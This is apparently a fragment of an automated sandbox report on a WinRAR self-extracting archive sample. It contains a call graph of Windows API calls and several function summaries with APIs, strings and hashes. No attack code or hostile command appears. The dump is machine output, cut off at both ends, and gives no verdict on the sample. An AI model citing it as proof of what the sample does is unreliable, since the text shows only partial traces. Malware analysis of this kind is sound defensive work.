24098->24169 24099 18b844 24099->24058 24100->24070 24104 18b768 DialogBoxParamW 24100->24104 24102 18b275 24106 17400a _swprintf 51 API calls 24102->24106 24107 18b41b 24103->24107 24104->24003 24104->24070 24105 18b486 24108 17ddd1 53 API calls 24105->24108 24109 18b297 CreateFileMappingW 24106->24109 24110 17400a _swprintf 51 API calls 24107->24110 24114 18b490 SetDlgItemTextW 24108->24114 24115 18b2f9 GetCommandLineW 24109->24115 24146 18b376 __vsnwprintf_l 24109->24146 24112 18b439 24110->24112 24126 17ddd1 53 API calls 24112->24126 24113 18b203 24116 18b215 24113->24116 24117 18b20a GetLastError 24113->24117 24179 1712e6 GetDlgItem ShowWindow 24114->24179 24120 18b30a 24115->24120 24122 179653 79 API calls 24116->24122 24117->24116 24118 18b381 ShellExecuteExW 24141 18b39e 24118->24141 24269 18ab2e SHGetMalloc 24120->24269 24122->24128 24123 18b4a2 SetDlgItemTextW GetDlgItem 24124 18b4bf GetWindowLongW SetWindowLongW 24123->24124 24125 18b4d7 24123->24125 24124->24125 24180 18bdf5 24125->24180 24126->24003 24127 18b326 24270 18ab2e SHGetMalloc 24127->24270 24128->24083 24128->24084 24132 18b332 24271 18ab2e SHGetMalloc 24132->24271 24133 18b3e1 24133->24097 24140 18b3f7 UnmapViewOfFile CloseHandle 24133->24140 24134 18bdf5 98 API calls 24136 18b4f3 24134->24136 24205 18d0f5 24136->24205 24137 18b33e 24272 17ecad 80 API calls ___scrt_get_show_window_mode 24137->24272 24140->24097 24141->24133 24144 18b3cd Sleep 24141->24144 24143 18b355 MapViewOfFile 24143->24146 24144->24133 24144->24141 24145 18bdf5 98 API calls 24150 18b519 24145->24150 24146->24118 24147 18b542 24273 1712c8 GetDlgItem EnableWindow 24147->24273 24149->24003 24149->24024 24150->24147 24151 18bdf5 98 API calls 24150->24151 24151->24147 24153 17136d 24152->24153 24155 171314 24152->24155 24279 17da71 GetWindowLongW SetWindowLongW 24153->24279 24156 17137a 24155->24156 24278 17da98 62 API calls 2 library calls 24155->24278 24156->23993 24156->23994 24156->24057 24158 171336 24158->24156 24159 171349 GetDlgItem 24158->24159 24159->24156 24160 171359 24159->24160 24160->24156 24161 17135f SetWindowTextW 24160->24161 24161->24156 24164 17a059 24162->24164 24163 17a0ea 24165 17a207 9 API calls 24163->24165 24167 17a113 24163->24167 24164->24163 24164->24167 24280 17a207 24164->24280 24165->24167 24167->24059 24167->24060 24168->24067 24170 179728 24169->24170 24171 179792 CreateFileW 24170->24171 24172 179786 24170->24172 24171->24172 24173 1797e4 24172->24173 24174 17b66c 2 API calls 24172->24174 24173->24113 24175 1797cb 24174->24175 24175->24173 24176 1797cf CreateFileW 24175->24176 24176->24173 24177->24095 24178->24105 24179->24123 24181 18bdff __EH_prolog 24180->24181 24182 18b4e5 24181->24182 24183 18aa36 ExpandEnvironmentStringsW 24181->24183 24182->24134 24192 18be36 _wcsrchr 24183->24192 24185 18aa36 ExpandEnvironmentStringsW 24185->24192 24186 18c11d SetWindowTextW 24186->24192 24189 1935de 22 API calls 24189->24192 24191 18bf0b SetFileAttributesW 24193 18bfc5 GetFileAttributesW 24191->24193 24204 18bf25 ___scrt_get_show_window_mode 24191->24204 24192->24182 24192->24185 24192->24186 24192->24189 24192->24191 24197 18c2e7 GetDlgItem SetWindowTextW SendMessageW 24192->24197 24201 18c327 SendMessageW 24192->24201 24301 1817ac CompareStringW 24192->24301 24302 189da4 GetCurrentDirectoryW 24192->24302 24304 17a52a 7 API calls 24192->24304 24305 17a4b3 FindClose 24192->24305 24306 18ab9a 76 API calls ___std_exception_copy 24192->24306 24193->24192 24196 18bfd7 DeleteFileW 24193->24196 24196->24192 24198 18bfe8 24196->24198 24197->24192 24199 17400a _swprintf 51 API calls 24198->24199 24200 18c008 GetFileAttributesW 24199->24200 24200->24198 24202 18c01d MoveFileW 24200->24202 24201->24192 24202->24192 24203 18c035 MoveFileExW 24202->24203 24203->24192 24204->24192 24204->24193 24303 17b4f7 52 API calls 2 library calls 24204->24303 24206 18d0ff __EH_prolog 24205->24206 24307 17fead 24206->24307 24208 18d130 24311 175c59 24208->24311 24210 18d14e 24315 177c68 24210->24315 24214 18d1a1 24332 177cfb 24214->24332 24216 18b504 24216->24145 24218 18cd38 24217->24218 24219 189d1a 4 API calls 24218->24219 24220 18cd3d 24219->24220 24221 18cd45 GetWindow 24220->24221 24222 18b5d1 24220->24222 24221->24222 24225 18cd65 24221->24225 24222->23999 24222->24000 24223 18cd72 GetClassNameW 24766 1817ac CompareStringW 24223->24766 24225->24222 24225->24223 24226 18cdfa GetWindow 24225->24226 24227 18cd96 GetWindowLongW 24225->24227 24226->24222 24226->24225 24227->24226 24228 18cda6 SendMessageW 24227->24228 24228->24226 24229 18cdbc GetObjectW 24228->24229 24767 189d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24229->24767 24231 18cdd3 24768 189d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24231->24768 24769 189f5d 8 API calls ___scrt_get_show_window_mode 24231->24769 24234 18cde4 SendMessageW DeleteObject 24234->24226 24235->24013 24237 18a2e8 24236->24237 24242 18a30d 24236->24242 24770 1817ac CompareStringW 24237->24770 24239 18a31b 24244 18a7c3 24239->24244 24240 18a312 SHAutoComplete 24240->24239 24241 18a2fb 24241->24242 24243 18a2ff FindWindowExW 24241->24243 24242->24239 24242->24240 24243->24242 24245 18a7cd __EH_prolog 24244->24245 24246 171380 82 API calls 24245->24246 24247 18a7ef 24246->24247 24771 171f4f 24247->24771 24250 18a818 24253 171951 126 API calls 24250->24253 24251 18a809 24252 171631 84 API calls 24251->24252 24254 18a814 24252->24254 24255 18a83a __vsnwprintf_l ___std_exception_copy 24253->24255 24254->24041 24254->24044 24255->24254 24256 171631 84 API calls 24255->24256 24256->24254 24257->24023 24259 18ac74 5 API calls 24258->24259 24260 18cb66 GetDlgItem 24259->24260 24261 18cb88 24260->24261 24262 18cbbc SendMessageW SendMessageW 24260->24262 24265 18cb93 ShowWindow SendMessageW SendMessageW 24261->24265 24263 18cbf8 24262->24263 24264 18cc17 SendMessageW SendMessageW SendMessageW 24262->24264 24263->24264 24266 18cc4a SendMessageW 24264->24266 24267 18cc6d SendMessageW 24264->24267 24265->24262 24266->24267 24267->24048 24268->24102 24269->24127 24270->24132 24271->24137 24272->24143 24273->24149 24274->24082 24275->24099 24276->24075 24277->24066 24278->24158 24279->24156 24281 17a214 24280->24281 24282 17a238 24281->24282 24283 17a22b CreateDirectoryW 24281->24283 24284 17a180 4 API calls 24282->24284 24283->24282 24285 17a26b 24283->24285 24286 17a23e 24284->24286 24289 17a27a 24285->24289 24293 17a444 24285->24293 24287 17a27e GetLastError 24286->24287 24290 17b66c 2 API calls 24286->24290 24287->24289 24289->24164 24291 17a254 24290->24291 24291->24287 24292 17a258 CreateDirectoryW 24291->24292 24292->24285 24292->24287 24294 18e360 24293->24294 24295 17a451 SetFileAttributesW 24294->24295 24296 17a467 24295->24296 24297 17a494 24295->24297 24298 17b66c 2 API calls 24296->24298 24297->24289 24299 17a47b 24298->24299 24299->24297 24300 17a47f SetFileAttributesW 24299->24300 24300->24297 24301->24192 24302->24192 24303->24204 24304->24192 24305->24192 24306->24192 24308 17feba 24307->24308 24336 171789 24308->24336 24310 17fed2 24310->24208 24312 17fead 24311->24312 24313 171789 76 API calls 24312->24313 24314 17fed2 24313->24314 24314->24210 24316 177c72 __EH_prolog 24315->24316 24353 17c827 24316->24353 24318 177c8d 24319 18e24a new 8 API calls 24318->24319 24320 177cb7 24319->24320 24359 18440b 24320->24359 24323 177ddf 24324 177de9 24323->24324 24329 177e53 24324->24329 24388 17a4c6 24324->24388 24326 177f06 24326->24214 24327 177ec4 24327->24326 24394 176dc1 74 API calls 24327->24394 24329->24327 24331 17a4c6 8 API calls 24329->24331 24366 17837f 24329->24366 24331->24329 24333 177d09 24332->24333 24335 177d10 24332->24335 24334 181acf 84 API calls 24333->24334 24334->24335 24337 17179f 24336->24337 24348 1717fa __vsnwprintf_l 24336->24348 24338 1717c8 24337->24338 24349 176e91 74 API calls __vswprintf_c_l 24337->24349 24340 171827 24338->24340 24345 1717e7 ___std_exception_copy 24338->24345 24342 1935de 22 API calls 24340->24342 24341 1717be 24350 176efd 75 API calls 24341->24350 24344 17182e 24342->24344 24344->24348 24352 176efd 75 API calls 24344->24352 24345->24348 24351 176efd 75 API calls 24345->24351 24348->24310 24349->24341 24350->24338 24351->24348 24352->24348 24354 17c831 __EH_prolog 24353->24354 24355 18e24a new 8 API calls 24354->24355 24356 17c874 24355->24356 24357 18e24a new 8 API calls 24356->24357 24358 17c898 24357->24358 24358->24318 24360 184415 __EH_prolog 24359->24360 24361 18e24a new 8 API calls 24360->24361 24363 184431 24361->24363 24362 177ce6 24362->24323 24363->24362 24365 1806ba 78 API calls 24363->24365 24365->24362 24367 178389 __EH_prolog 24366->24367 24395 171380 24367->24395 24369 1783a4 24403 179ef7 24369->24403 24375 1783d3 24523 171631 24375->24523 24376 17846e 24422 178517 24376->24422 24380 1784ce 24426 171f00 24380->24426 24383 1783cf 24383->24375 24383->24376 24385 17a4c6 8 API calls 24383->24385 24527 17bac4 CompareStringW 24383->24527 24384 1784d9 24384->24375 24430 173aac 24384->24430 24440 17857b 24384->24440 24385->24383 24389 17a4db 24388->24389 24393 17a4df 24389->24393 24754 17a5f4 24389->24754 24391 17a4ef 24392 17a4f4 FindClose 24391->24392 24391->24393 24392->24393 24393->24324 24394->24326 24396 171385 __EH_prolog 24395->24396 24397 17c827 8 API calls 24396->24397 24398 1713bd 24397->24398 24399 18e24a new 8 API calls 24398->24399 24402 171416 ___scrt_get_show_window_mode 24398->24402 24400 171403 24399->24400 24401 17b07d 82 API calls 24400->24401 24400->24402 24401->24402 24402->24369 24404 179f0e 24403->24404 24405 1783ba 24404->24405 24529 176f5d 76 API calls 24404->24529 24405->24375 24407 1719a6 24405->24407 24408 1719b0 __EH_prolog 24407->24408 24419 171a00 24408->24419 24420 1719e5 24408->24420 24530 17709d 24408->24530 24410 171b50 24533 176dc1 74 API calls 24410->24533 24412 173aac 97 API calls 24416 171bb3 24412->24416 24413 171b60 24413->24412 24413->24420 24414 171bff 24414->24420 24421 171c32 24414->24421 24534 176dc1 74 API calls 24414->24534 24416->24414 24417 173aac 97 API calls 24416->24417 24417->24416 24418 173aac 97 API calls 24418->24421 24419->24410 24419->24413 24419->24420 24420->24383 24421->24418 24421->24420 24423 178524 24422->24423 24552 180c26 GetSystemTime SystemTimeToFileTime 24423->24552 24425 178488 24425->24380 24528 181359 72 API calls 24425->24528 24428 171f05 __EH_prolog 24426->24428 24427 171f39 24427->24384 24428->24427 24554 171951 24428->24554 24431 173abc 24430->24431 24432 173ab8 24430->24432 24433 173af7 24431->24433 24434 173ae9 24431->24434 24432->24384 24689 1727e8 97 API calls 3 library calls 24433->24689 24436 173b29 24434->24436 24688 173281 85 API calls 3 library calls 24434->24688 24436->24384 24438 173af5 24438->24436 24690 17204e 74 API calls 24438->24690 24441 178585 __EH_prolog 24440->24441 24442 1785be 24441->24442 24450 1785c2 24441->24450 24713 1884bd 99 API calls 24441->24713 24443 1785e7 24442->24443 24448 17867a 24442->24448 24442->24450 24444 178609 24443->24444 24443->24450 24714 177b66 151 API calls 24443->24714 24444->24450 24715 1884bd 99 API calls 24444->24715 24448->24450 24691 175e3a 24448->24691 24450->24384 24451 178705 24451->24450 24697 17826a 24451->24697 24454 178875 24455 17a4c6 8 API calls 24454->24455 24456 1788e0 24454->24456 24455->24456 24701 177d6c 24456->24701 24458 17c991 80 API calls 24461 17893b _memcmp 24458->24461 24459 178a70 24460 178b43 24459->24460 24467 178abf 24459->24467 24465 178b9e 24460->24465 24475 178b4e 24460->24475 24461->24450 24461->24458 24461->24459 24462 178a69 24461->24462 24716 178236 82 API calls 24461->24716 24717 171f94 74 API calls 24461->24717 24718 171f94 74 API calls 24462->24718 24474 178b30 24465->24474 24721 1780ea 96 API calls 24465->24721 24466 178b9c 24468 179653 79 API calls 24466->24468 24469 17a180 4 API calls 24467->24469 24467->24474 24468->24450 24472 178af7 24469->24472 24471 179653 79 API calls 24471->24450 24472->24474 24719 179377 96 API calls 24472->24719 24473 178c09 24477 179989 GetFileType 24473->24477 24486 178c74 24473->24486 24522 1791c1 __except_handler4 24473->24522 24474->24466 24474->24473 24475->24466 24720 177f26 100 API calls __except_handler4 24475->24720 24476 17aa88 8 API calls 24479 178cc3 24476->24479 24481 178c4c 24477->24481 24482 17aa88 8 API calls 24479->24482 24481->24486 24722 171f94 74 API calls 24481->24722 24500 178cd9 24482->24500 24484 178c62 24723 177061 75 API calls 24484->24723 24486->24476 24487 178d9c 24488 178df7 24487->24488 24489 178efd 24487->24489 24490 178e69 24488->24490 24491 178e07 24488->24491 24493 178f23 24489->24493 24494 178f0f 24489->24494 24510 178e27 24489->24510 24492 17826a CharUpperW 24490->24492 24496 178e4d 24491->24496 24504 178e15 24491->24504 24497 178e84 24492->24497 24495 182c42 75 API calls 24493->24495 24498 1792e6 121 API calls 24494->24498 24499 178f3c 24495->24499 24496->24510 24726 177907 108 API calls 24496->24726 24506 178eb4 24497->24506 24507 178ead 24497->24507 24497->24510 24498->24510 24729 1828f1 121 API calls 24499->24729 24500->24487 24724 179b21 SetFilePointer GetLastError SetEndOfFile 24500->24724 24725 171f94 74 API calls 24504->24725 24728 179224 94 API calls __EH_prolog 24506->24728 24727 177698 84 API calls __except_handler4 24507->24727 24513 17904b 24510->24513 24730 171f94 74 API calls 24510->24730 24512 179156 24515 17a444 4 API calls 24512->24515 24512->24522 24513->24512 24514 179104 24513->24514 24513->24522 24707 179ebf SetEndOfFile 24513->24707 24708 179d62 24514->24708 24516 1791b1 24515->24516 24516->24522 24731 171f94 74 API calls 24516->24731 24519 17914b 24521 1796d0 75 API calls 24519->24521 24521->24512 24522->24471 24524 171643 24523->24524 24746 17c8ca 24524->24746 24527->24383 24528->24380 24529->24405 24535 1716d2 24530->24535 24532 1770b9 24532->24419 24533->24420 24534->24421 24536 1716e8 24535->24536 24547 171740 __vsnwprintf_l 24535->24547 24537 171711 24536->24537 24548 176e91 74 API calls __vswprintf_c_l 24536->24548 24539 171767 24537->24539 24544 17172d ___std_exception_copy 24537->24544 24541 1935de 22 API calls 24539->24541 24540 171707 24549 176efd 75 API calls 24540->24549 24543 17176e 24541->24543 24543->24547 24551 176efd 75 API calls 24543->24551 24544->24547 24550 176efd 75 API calls 24544->24550 24547->24532 24548->24540 24549->24537 24550->24547 24551->24547 24553 180c56 __vswprintf_c_l 24552->24553 24553->24425 24555 171961 24554->24555 24557 17195d 24554->24557 24558 171896 24555->24558 24557->24427 24559 1718a8 24558->24559 24560 1718e5 24558->24560 24561 173aac 97 API calls 24559->24561 24566 173f18 24560->24566 24564 1718c8 24561->24564 24564->24557 24570 173f21 24566->24570 24567 173aac 97 API calls 24567->24570 24568 171906 24568->24564 24571 171e00 24568->24571 24570->24567 24570->24568 24583 18067c 24570->24583 24572 171e0a __EH_prolog 24571->24572 24591 173b3d 24572->24591 24574 171e34 24575 1716d2 76 API calls 24574->24575 24582 171ebb 24574->24582 24576 171e4b 24575->24576 24619 171849 76 API calls 24576->24619 24578 171e63 24580 171e6f 24578->24580 24620 18137a MultiByteToWideChar 24578->24620 24621 171849 76 API calls 24580->24621 24582->24564 24584 180683 24583->24584 24585 18069e 24584->24585 24589 176e8c RaiseException Concurrency::cancel_current_task 24584->24589 24587 1806af SetThreadExecutionState 24585->24587 24590 176e8c RaiseException Concurrency::cancel_current_task 24585->24590 24587->24570 24589->24585 24590->24587 24592 173b47 __EH_prolog 24591->24592 24593 173b5d 24592->24593 24594 173b79 24592->24594 24650 176dc1 74 API calls 24593->24650 24596 173dc2 24594->24596 24599 173ba5 24594->24599 24667 176dc1 74 API calls 24596->24667 24598 173b68 24598->24574 24599->24598 24622 182c42 24599->24622 24601 173c26 24602 173cb1 24601->24602 24618 173c1d 24601->24618 24653 17c991 24601->24653 24635 17aa88 24602->24635 24603 173c22 24603->24601 24652 172034 76 API calls 24603->24652 24605 173bf4 24605->24601 24605->24603 24606 173c12 24605->24606 24651 176dc1 74 API calls 24606->24651 24608 173cc4 24612 173d3e 24608->24612 24613 173d48 24608->24613 24639 1792e6 24612->24639 24659 1828f1 121 API calls 24613->24659 24616 173d46 24616->24618 24660 171f94 74 API calls 24616->24660 24661 181acf 24618->24661 24619->24578 24620->24580 24621->24582 24623 182c51 24622->24623 24625 182c5b 24622->24625 24668 176efd 75 API calls 24623->24668 24626 182ca2 ___std_exception_copy 24625->24626 24628 182c9d Concurrency::cancel_current_task 24625->24628 24633 182cfd ___scrt_get_show_window_mode 24625->24633 24627 182da9 Concurrency::cancel_current_task 24626->24627 24629 182cd9 24626->24629 24626->24633 24671 19157a RaiseException 24627->24671 24670 19157a RaiseException 24628->24670 24669 182b7b 75 API calls 3 library calls 24629->24669 24633->24605 24634 182dc1 24636 17aa95 24635->24636 24638 17aa9f 24635->24638 24637 18e24a new 8 API calls 24636->24637 24637->24638 24638->24608 24640 1792f0 __EH_prolog 24639->24640 24672 177dc6 24640->24672 24643 17709d 76 API calls 24644 179302 24643->24644 24675 17ca6c 24644->24675 24646 17935c 24646->24616 24648 17ca6c 114 API calls 24649 179314 24648->24649 24649->24646 24649->24648 24684 17cc51 97 API calls __vsnwprintf_l 24649->24684 24650->24598 24651->24618 24652->24601 24654 17c9c4 24653->24654 24655 17c9b2 24653->24655 24686 176249 80 API calls 24654->24686 24685 176249 80 API calls 24655->24685 24658 17c9bc 24658->24602 24659->24616 24660->24618 24662 181ad9 24661->24662 24663 181af2 24662->24663 24666 181b06 24662->24666 24687 18075b 84 API calls 24663->24687 24665 181af9 24665->24666 24667->24598 24668->24625 24669->24633 24670->24627 24671->24634 24673 17acf5 GetVersionExW 24672->24673 24674 177dcb 24673->24674 24674->24643 24681 17ca82 __vsnwprintf_l 24675->24681 24676 17cbf7 24677 17cc1f 24676->24677 24678 17ca0b 6 API calls 24676->24678 24679 18067c SetThreadExecutionState RaiseException 24677->24679 24678->24677 24682 17cbee 24679->24682 24680 1884bd 99 API calls 24680->24681 24681->24676 24681->24680 24681->24682 24683 17ab70 89 API calls 24681->24683 24682->24649 24683->24681 24684->24649 24685->24658 24686->24658 24687->24665 24688->24438 24689->24438 24690->24436 24692 175e4a 24691->24692 24732 175d67 24692->24732 24695 175e7d 24696 175eb5 24695->24696 24737 17ad65 CharUpperW CompareStringW 24695->24737 24696->24451 24698 178289 24697->24698 24743 18179d CharUpperW 24698->24743 24700 178333 24700->24454 24702 177d7b 24701->24702 24703 177dbb 24702->24703 24744 177043 74 API calls 24702->24744 24703->24461 24705 177db3 24745 176dc1 74 API calls 24705->24745 24707->24514 24709 179d73 24708->24709 24711 179d82 24708->24711 24710 179d79 FlushFileBuffers 24709->24710 24709->24711 24710->24711 24712 179dfb SetFileTime 24711->24712 24712->24519 24713->24442 24714->24444 24715->24450 24716->24461 24717->24461 24718->24459 24719->24474 24720->24466 24721->24474 24722->24484 24723->24486 24724->24487 24725->24510 24726->24510 24727->24510 24728->24510 24729->24510 24730->24513 24731->24522 24738 175c64 24732->24738 24734 175d88 24734->24695 24736 175c64 2 API calls 24736->24734 24737->24695 24741 175c6e 24738->24741 24739 175d56 24739->24734 24739->24736 24741->24739 24742 17ad65 CharUpperW CompareStringW 24741->24742 24742->24741 24743->24700 24744->24705 24745->24703 24747 17c8db 24746->24747 24752 17a90e 84 API calls 24747->24752 24749 17c90d 24753 17a90e 84 API calls 24749->24753 24751 17c918 24752->24749 24753->24751 24755 17a5fe 24754->24755 24756 17a691 FindNextFileW 24755->24756 24757 17a621 FindFirstFileW 24755->24757 24758 17a6b0 24756->24758 24759 17a69c GetLastError 24756->24759 24760 17a638 24757->24760 24765 17a675 24757->24765 24758->24765 24759->24758 24761 17b66c 2 API calls 24760->24761 24762 17a64d 24761->24762 24763 17a651 FindFirstFileW 24762->24763 24764 17a66a GetLastError 24762->24764 24763->24764 24763->24765 24764->24765 24765->24391 24766->24225 24767->24231 24768->24231 24769->24234 24770->24241 24772 179ef7 76 API calls 24771->24772 24773 171f5b 24772->24773 24774 171f78 24773->24774 24775 1719a6 97 API calls 24773->24775 24774->24250 24774->24251 24776 171f68 24775->24776 24776->24774 24778 176dc1 74 API calls 24776->24778 24778->24774 24827 18b8e0 93 API calls _swprintf 24828 188ce0 6 API calls 24831 1a16e0 CloseHandle

                  Executed Functions

                  Function 0018D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 001800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 001800E4
                    • Part of subcall function 001800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001800F6
                    • Part of subcall function 001800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00180127
                    • Part of subcall function 00189DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00189DAC
                    • Part of subcall function 0018A335: OleInitialize.OLE32(00000000), ref: 0018A34E
                    • Part of subcall function 0018A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0018A385
                    • Part of subcall function 0018A335: SHGetMalloc.SHELL32(001B8430), ref: 0018A38F
                    • Part of subcall function 001813B3: GetCPInfo.KERNEL32(00000000,?), ref: 001813C4
                    • Part of subcall function 001813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 001813D8
                  • GetCommandLineW.KERNEL32 ref: 0018D61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0018D643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0018D654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0018D68E
                    • Part of subcall function 0018D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0018D29D
                    • Part of subcall function 0018D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0018D2D9
                  • CloseHandle.KERNEL32(00000000), ref: 0018D697
                  • GetModuleFileNameW.KERNEL32(00000000,001CDC90,00000800), ref: 0018D6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,001CDC90), ref: 0018D6BE
                  • GetLocalTime.KERNEL32(?), ref: 0018D6C9
                  • _swprintf.LIBCMT ref: 0018D708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0018D71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0018D721
                  • LoadIconW.USER32(00000000,00000064), ref: 0018D738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0018D789
                  • Sleep.KERNEL32(?), ref: 0018D7B7
                  • DeleteObject.GDI32 ref: 0018D7F0
                  • DeleteObject.GDI32(?), ref: 0018D800
                  • CloseHandle.KERNEL32 ref: 0018D843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                  • API String ID: 788466649-3743209390
                  • Opcode ID: e125db3e5b2488dbb97cddfa13e9a7d2a5c90d3648bb9cc9c6007fee1d11e612
                  • Instruction ID: 72dd82d19c5746b91b34fed4ae1d885e05b2a827372a2bf8161df56807605c5b
                  • Opcode Fuzzy Hash: e125db3e5b2488dbb97cddfa13e9a7d2a5c90d3648bb9cc9c6007fee1d11e612
                  • Instruction Fuzzy Hash: C961C371A04341AFD320BBB5EC4AF6B3BACAB5A740F040529F545925A2DB74DE84CF62
                  Function 00189E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 770 189e1c-189e38 FindResourceW 771 189e3e-189e50 SizeofResource 770->771 772 189f2f-189f32 770->772 773 189e70-189e72 771->773 774 189e52-189e61 LoadResource 771->774 776 189f2e 773->776 774->773 775 189e63-189e6e LockResource 774->775 775->773 777 189e77-189e8c GlobalAlloc 775->777 776->772 778 189f28-189f2d 777->778 779 189e92-189e9b GlobalLock 777->779 778->776 780 189f21-189f22 GlobalFree 779->780 781 189ea1-189ebf call 18f4b0 CreateStreamOnHGlobal 779->781 780->778 784 189f1a-189f1b GlobalUnlock 781->784 785 189ec1-189ee3 call 189d7b 781->785 784->780 785->784 790 189ee5-189eed 785->790 791 189f08-189f16 790->791 792 189eef-189f03 GdipCreateHBITMAPFromBitmap 790->792 791->784 792->791 793 189f05 792->793 793->791
                  APIs
                  • FindResourceW.KERNEL32(0018AE4D,PNG,?,?,?,0018AE4D,00000066), ref: 00189E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0018AE4D,00000066), ref: 00189E46
                  • LoadResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E59
                  • LockResource.KERNEL32(00000000,?,?,?,0018AE4D,00000066), ref: 00189E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0018AE4D,00000066), ref: 00189E82
                  • GlobalLock.KERNEL32(00000000), ref: 00189E93
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00189EB7
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00189EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 00189F1B
                  • GlobalFree.KERNEL32(00000000), ref: 00189F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                  • String ID: PNG
                  • API String ID: 3656887471-364855578
                  • Opcode ID: 0c2c1889a4c376b1616dd90460d24167eaab57fee579a3c1febef170c04dfabc
                  • Instruction ID: 63373f0c6612bfd3b2fc51353ce6864cd99c8d512c274938ddbedb386ae1af6f
                  • Opcode Fuzzy Hash: 0c2c1889a4c376b1616dd90460d24167eaab57fee579a3c1febef170c04dfabc
                  • Instruction Fuzzy Hash: C2319371204706AFC711AF61DC48A2BBFADFF8A751B080529F916D2660DB31DD40CF60
                  Function 0017A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 970 17a5f4-17a61f call 18e360 973 17a691-17a69a FindNextFileW 970->973 974 17a621-17a632 FindFirstFileW 970->974 975 17a6b0-17a6b2 973->975 976 17a69c-17a6aa GetLastError 973->976 977 17a6b8-17a75c call 17fe56 call 17bcfb call 180e19 * 3 974->977 978 17a638-17a64f call 17b66c 974->978 975->977 979 17a761-17a774 975->979 976->975 977->979 985 17a651-17a668 FindFirstFileW 978->985 986 17a66a-17a673 GetLastError 978->986 985->977 985->986 988 17a675-17a678 986->988 989 17a684 986->989 988->989 990 17a67a-17a67d 988->990 991 17a686-17a68c 989->991 990->989 993 17a67f-17a682 990->993 991->979 993->991
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A692
                  • GetLastError.KERNEL32(?,?,?,?,0017A4EF,000000FF,?,?), ref: 0017A69E
                  Memory Dump Source
